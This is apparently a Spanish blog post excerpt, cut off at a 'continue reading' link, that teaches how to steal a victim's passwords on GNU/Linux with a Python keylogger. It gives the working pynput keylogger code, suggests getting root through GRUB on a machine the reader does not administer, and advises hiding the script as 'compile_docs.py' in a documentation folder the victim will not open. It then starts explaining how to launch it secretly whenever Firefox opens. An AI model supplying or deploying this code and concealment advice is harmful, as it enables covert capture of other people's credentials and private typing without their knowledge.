Una forma sencilla de robar contraseñas es instalar un registrador de
teclas (keylogger) en el ordenador de la víctima. Voy
a mostrar cómo hacerlo en GNU/Linux usando el lenguaje de programación
Python.
Lo primero que debemos hacer es obtener permisos de superusuario. Si el
equipo lo administramos nosotros, ya sabemos la contraseña. En caso
contrario, podemos
obtener acceso como superusuario desde
GRUB. Con
los permisos necesarios tenemos vía libre para instalar el
keylogger.
En primer lugar, hay que instalar el módulo pynput
mediante...
A continuación, debemos escribir el keylogger. Este
es el código que usaremos:
#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging
log_dir = "/usr/share/doc/python3/"
logging.basicConfig(filename=(log_dir + "log"), \
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
El registro de teclas se guarda en log_dir
. Yo, en este caso, he
especificado la carpeta de documentación de Python 3 en GNU/Linux.
El keylogger también podemos guardarlo en ese mismo
directorio, quizá con el nombre compile_docs.py
o algo
parecido para no llamar la atención. Lo ideal es elegir una carpeta a la
que la victima no vaya a entrar para evitar que se dé cuenta de lo que
estamos haciendo.
El último paso sería ejecutar el programa cada vez que se encienda el
ordenador o se inicie un programa sin que la víctima se
dé cuenta. Si, por ejemplo, queremos iniciar el keylogger cada vez que el usuario abra Firefox, podemos
modificar el comando Firefox. Continúa leyendo Registrador de teclas (keylogger) básico para GNU/Linux. Robar contraseñas e información tecleada